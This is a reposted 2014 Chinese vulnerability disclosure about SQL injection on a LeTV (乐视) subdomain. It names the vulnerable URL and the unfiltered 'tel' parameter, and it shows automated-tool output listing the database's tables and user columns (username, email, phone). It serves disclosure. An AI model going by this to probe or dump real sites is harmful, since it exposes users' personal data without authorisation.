记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

乐视网某分站sql注射

2014-06-13 11:25

问题站点:



http://gacfiatauto.hz.letv.com/





注射链接:



http://gacfiatauto.hz.letv.com/php/vogusernum.php?callback=jQuery171032845610193908215_1398744981011&tel=1&_=1398745012738





tel参数未作过滤,造成注射。



手工简单判断了下就丢工具去跑了





leshi zhushe.png









库,表

Database: viaggio

[2 tables]

+---------+

| vig_tp |

| viguser |

+---------+





Database: viaggio

Table: viguser

[8 columns]

+----------+--------------+

| Column | Type |

+----------+--------------+

| city | varchar(20) |

| email | varchar(100) |

| flag | varchar(10) |

| id | int(20) |

| num | int(10) |

| prov | varchar(20) |

| tel | varchar(15) |

| username | varchar(100) |

+----------+--------------+





用户名 电话神马的 ~~



尽快修复吧!

漏洞证明:

leshi zhushe.png









库,表

Database: viaggio

[2 tables]

+---------+

| vig_tp |

| viguser |

+---------+





Database: viaggio

Table: viguser

[8 columns]

+----------+--------------+

| Column | Type |

+----------+--------------+

| city | varchar(20) |

| email | varchar(100) |

| flag | varchar(10) |

| id | int(20) |

| num | int(10) |

| prov | varchar(20) |

| tel | varchar(15) |

| username | varchar(100) |

+----------+--------------+

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2014-058831

阅读:54390 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“乐视网某分站sql注射”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云